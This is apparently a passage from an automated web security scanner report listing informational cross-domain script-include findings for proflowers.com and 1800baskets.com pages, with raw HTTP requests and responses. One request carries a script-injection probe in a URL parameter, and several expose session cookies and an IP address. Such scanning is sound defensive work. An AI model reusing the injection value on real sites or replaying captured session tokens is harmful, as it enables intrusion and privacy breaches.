<div class="searchBarBottom"><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.05.07.2"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucproductsearchinput.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<div id="productDetailBody_deliveryCalendar" prvdid="calendarparentcontrol"><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-ui-1.7.1.core_draggable.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/ui.dialog.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucdeliverycalendarcustom.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</div>

                           
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-ui-1.7.1.core_draggable.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/ui.dialog.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/giftsmartoverlay.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
orized use is prohibited.* This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. US 6606581, 6421724, 6785717 B1 and other patents pending. * http://www.opinionlab.com--><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<br /><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/bookmark.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
horized use is prohibited.* This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. US 6606581, 6421724, 6785717 B1 and other patents pending.* http://www.opinionlab.com--><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.05.07.2"></script><!--ooend--><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/swfobject.js?siteversionnumber=2011.05.07.2"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/tvvideopopup.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</script>
   <script src="https://cdn.mercent.com/js/tracker.js" type="text/javascript"></script>
...[SNIP]...
</span>


       <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/instantservicechat.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</span>


<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/certona/resxclsa.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...

17.11. http://products.proflowers.com/flowers/Deluxe-Succulent-Garden-30008396

Summary

Severity:   Information
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/Deluxe-Succulent-Garden-30008396

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /flowers/Deluxe-Succulent-Garden-30008396?viewpos=1&trackingpgroup=PBS&tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&Ref=HomeNoRef HTTP/1.1
Host: products.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA1abf9\%22%3balert(1)//e408dc57373&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX,NFX; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:16:38 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253ACategory%25253Aproductgroup%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fproducts.proflowers.com%25252Fflowers%25252FDeluxe-Succulent-Garden-30008396%25253Fviewpos%25253D1%252526trackingpgroup%25253DPBS%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:16:38 AM?30008396&5/9/2011 5:18:27 AM; domain=.proflowers.com; expires=Sun, 07-Aug-2011 12:18:27 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:18:27 GMT
Content-Length: 136888


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
<div>
   
           
                           <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js"></script>


<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/productdetails.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<input type="hidden" name="productDetailBody$_hdQS" id="productDetailBody__hdQS" />
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucproductsetselectionsimple.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucpersonalizationselection.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/externalproducts.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<link rel="shortcut icon" href="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/favicon.ico"/> <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<div style="margin:0px 0 5 0;"><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/topnav.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<div class="searchBarBottom"><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.05.07.2"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucproductsearchinput.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<div id="productDetailBody_deliveryCalendar" prvdid="calendarparentcontrol"><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-ui-1.7.1.core_draggable.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/ui.dialog.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucdeliverycalendarcustom.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</div>

                           
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-ui-1.7.1.core_draggable.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/ui.dialog.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/giftsmartoverlay.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
orized use is prohibited.* This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. US 6606581, 6421724, 6785717 B1 and other patents pending. * http://www.opinionlab.com--><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<br /><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/bookmark.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
horized use is prohibited.* This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. US 6606581, 6421724, 6785717 B1 and other patents pending.* http://www.opinionlab.com--><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.05.07.2"></script><!--ooend--><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/swfobject.js?siteversionnumber=2011.05.07.2"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/tvvideopopup.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</script>
   <script src="https://cdn.mercent.com/js/tracker.js" type="text/javascript"></script>
...[SNIP]...
</script>

       
       <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/instantservicechat.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</span>


<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/certona/resxclsa.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...

17.12. http://products.proflowers.com/flowers/The-Ultimate-Office-Plant-30003767

Summary

Severity:   Information
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/The-Ultimate-Office-Plant-30003767

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /flowers/The-Ultimate-Office-Plant-30003767?viewpos=6&trackingpgroup=PBS&tile=hmpg_podA&Ref=HomeNoRef HTTP/1.1
Host: products.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:50 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253ACategory%25253APBS%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fproducts.proflowers.com%25252Fflowers%25252FThe-Ultimate-Office-Plant-30003767%25253Fviewpos%25253D6%252526trackingpgroup%25253DP%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:50 AM?30003767&5/9/2011 5:12:27 AM; domain=.proflowers.com; expires=Sun, 07-Aug-2011 12:12:27 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:12:27 GMT
Content-Length: 139819


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
<div>
   
           
                           <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js"></script>


<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/productdetails.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<input type="hidden" name="productDetailBody$_hdQS" id="productDetailBody__hdQS" />
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucproductsetselectionsimple.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucpersonalizationselection.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/externalproducts.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<link rel="shortcut icon" href="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/favicon.ico"/> <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<div style="margin:0px 0 5 0;"><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/topnav.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<div class="searchBarBottom"><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.05.07.2"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucproductsearchinput.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<div id="productDetailBody_deliveryCalendar" prvdid="calendarparentcontrol"><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-ui-1.7.1.core_draggable.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/ui.dialog.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucdeliverycalendarcustom.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</div>

                           
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-ui-1.7.1.core_draggable.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/ui.dialog.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/giftsmartoverlay.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
orized use is prohibited.* This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. US 6606581, 6421724, 6785717 B1 and other patents pending. * http://www.opinionlab.com--><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<br /><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/bookmark.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
horized use is prohibited.* This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. US 6606581, 6421724, 6785717 B1 and other patents pending.* http://www.opinionlab.com--><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.05.07.2"></script><!--ooend--><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/swfobject.js?siteversionnumber=2011.05.07.2"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/tvvideopopup.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</script>
   <script src="https://cdn.mercent.com/js/tracker.js" type="text/javascript"></script>
...[SNIP]...
</script>

       
       <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/instantservicechat.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</span>


<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/certona/resxclsa.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...

17.13. http://ww30.1800baskets.com/deliverycalendarnew.do

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ww30.1800baskets.com
Path:   /deliverycalendarnew.do

Issue detail

The response dynamically includes the following script from another domain:

Request

POST /deliverycalendarnew.do?month=5&year=2011&locationType=1&itemCount=1&prodType=GPT&productPrice=29.99&zip=10010&country=&productSKU=93260&contextPageType=PRODUCT&isGeoSell=false&field=deliveryDate&baseCode=93260&nextMonthAvailableCheck=true&page=product HTTP/1.1
Host: ww30.1800baskets.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800baskets.com/product.do?baseCode=93260&dataset=11309
Origin: http://ww30.1800baskets.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000MKdbdCo70zXsBXxIys-COzm:-1; ShopperManagerEnterprise=aed35ad7-54a3-48bc-a8e0-0c9f3d76e618; FSESSIONID=847b741e4593439b8e3ed6040ba46630; brandCode=1001; __utmz=1.1304903358.1.1.utmcsr=ww30.1800flowers.com|utmccn=(referral)|utmcmd=referral|utmcct=/collection.do; cmTPSet=Y; CMAVID=70091303843240316067555; 87011923-VID=16601209214853; 87011923-SKEY=6825682268674136395; HumanClickSiteContainerID_87011923=STANDALONE; __unam=bbc31a8-12fd24e67c1-26d7039-1; __utma=1.534657557.1304903358.1304903358.1304903358.1; __utmc=1; __utmb=1.2.10.1304903358; CoreAt=90074784=1|2|0|0|0|0|0|1|0|0|0|0|1|1304903358|1_|1561_&; cmRS=&t1=1304903446336&t2=1304903453532&t3=1304903453756&t4=1304903443093&lti=1304903453755&ln=sd&hr=javascript%3AcheckNShowAppParamLightBoxCalendar%28deliveryDate%2Ctrue%29%3B&fti=&fn=searchform%3A0%3BproductForm%3A1%3Bsigninform%3A2%3Bfindgiftform%3A3%3BUNDEFINED%3A4%3B&ac=&fd=&uer=&fu=&pi=PRODUCT%3A%20The%20Popcorn%20Factory%20Party%20Pup%20Snack%20Tin%20%2893260%29&ho=blooms.1800flowers.com/cm%3F&ci=90074784
Content-Length: 0

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:18:13 GMT
Server: IBM_HTTP_Server
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAa IVDa CONo HISa TELo OUR DELa SAMo UNRo OTRo IND UNI NAV"
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=00001N288SgFQQcgjdh8LBTc6IT:-1; Path=/
Vary: Accept-Encoding
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 52934


<html>
<head>    
<link rel="stylesheet" type="text/css" href="http://media1.1800flowers.com/800f_assets/jet/website/styles/baskets/flowers_enterprise_apr1.css"/>

<script type="text/javascript" src="http://media1.1800flowers.com/800f_assets/jet/website/scripts/flowers/flowers_enterprise_apr9.js"></script>
...[SNIP]...

17.14. http://ww30.1800baskets.com/product.do

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ww30.1800baskets.com
Path:   /product.do

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /product.do?baseCode=93260&dataset=11309 HTTP/1.1
Host: ww30.1800baskets.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800baskets.com/template.do?id=template3&page=2000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000MKdbdCo70zXsBXxIys-COzm:-1; ShopperManagerEnterprise=aed35ad7-54a3-48bc-a8e0-0c9f3d76e618; FSESSIONID=847b741e4593439b8e3ed6040ba46630; brandCode=1001; __utmz=1.1304903358.1.1.utmcsr=ww30.1800flowers.com|utmccn=(referral)|utmcmd=referral|utmcct=/collection.do; __utma=1.534657557.1304903358.1304903358.1304903358.1; __utmc=1; __utmb=1.1.10.1304903358; cmTPSet=Y; CMAVID=70091303843240316067555; 87011923-VID=16601209214853; 87011923-SKEY=6825682268674136395; HumanClickSiteContainerID_87011923=STANDALONE; CoreAt=90074784=1|1|0|0|0|0|0|0|0|0|0|0|1|1304903358|1_|1561_&; cmRS=&t1=1304903358829&t2=1304903368545&t3=1304903441095&lti=1304903441095&ln=&hr=/product.do%3FbaseCode%3D93260%26dataset%3D11309&fti=&fn=searchform%3A0%3BUNDEFINED%3A1%3B&ac=&fd=&uer=&fu=&pi=18B%3Atemplate-The%20Popcorn%20Factory&ho=blooms.1800flowers.com/cm%3F&ci=90074784&ul=http%3A//ww30.1800baskets.com/template.do%3Fid%3Dtemplate3%26page%3D2000&rf=http%3A//ww30.1800flowers.com/collection.do%3Fdataset%3D10305

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:17:19 GMT
Server: IBM_HTTP_Server
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAa IVDa CONo HISa TELo OUR DELa SAMo UNRo OTRo IND UNI NAV"
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Vary: Accept-Encoding
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 83726


                                                <html xmlns="http://www.w3.org/1999/xhtml"
    xmlns:og="http://ogp.me/ns#"
    xmlns:fb="http://www.face
...[SNIP]...
</style>
<script src="http://w.sharethis.com/widget/?tabs=web%2Cpost%2Cemail&amp;charset=utf-8&amp;style=rotate&amp;publisher=a396cc33-4aff-4879-b5e0-d9ab5133031a&amp;headerbg=%23669933&amp;linkfg=%23663399&amp;offsetLeft=-155&amp;embeds=true&amp;button=false&amp;onmouseover=false" type="text/javascript"></script>
...[SNIP]...
</div>    
    <script type="text/javascript" src="http://media3.1800flowers.com/800f_assets/jet/website/scripts/flowers/dropdowntabs_v3.js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://media1.1800flowers.com/800f_assets/jet/website/scripts/flowers/flowers_enterprise_apr9.js"></script>
<script type="text/javascript" src="http://media3.1800flowers.com/800f_assets/jet/website/scripts/flowers/thirdparty_merged_mday1.js"></script>
<script type="text/javascript" src="http://media6.1800flowers.com/800f_assets/jet/website/scripts/flowers/product_apr7.js"></script>
<script type="text/javascript" src="http://media3.1800flowers.com/800f_assets/jet/website/scripts/flowers/calendar/date.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://media5.1800flowers.com/800f_assets/jet/website/scripts/flowers/martha-tab_aug2.js"></script>
...[SNIP]...
</script>


                                       <script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...
<div id="rr_allpages"><script type="text/javascript" src="http://media.richrelevance.com/rrserver/js/0.4/p13n.js"></script>
...[SNIP]...
<!-- Mercent Tag Start -->

<script src="https://cdn.mercent.com/js/tracker.js"
   type="text/javascript">
</script>
...[SNIP]...
</div><script type="text/javascript" src="//libs.coremetrics.com/eluminate.js"></script>
<script type="text/javascript" src="http://media1.1800flowers.com/800f_assets/jet/website/scripts/flowers/cmcustom.js"></script>
...[SNIP]...
</script>


   <script language="javascript1.1" src="http://media2.1800flowers.com/800f_assets/jet/website/scripts/flowers/livePerson/800-chat-sales-english_mtagconfig.js" type="text/javascript"></script>
...[SNIP]...

17.15. http://ww30.1800baskets.com/shoppingbasket.do

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ww30.1800baskets.com
Path:   /shoppingbasket.do

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /shoppingbasket.do HTTP/1.1
Host: ww30.1800baskets.com
Proxy-Connection: keep-alive
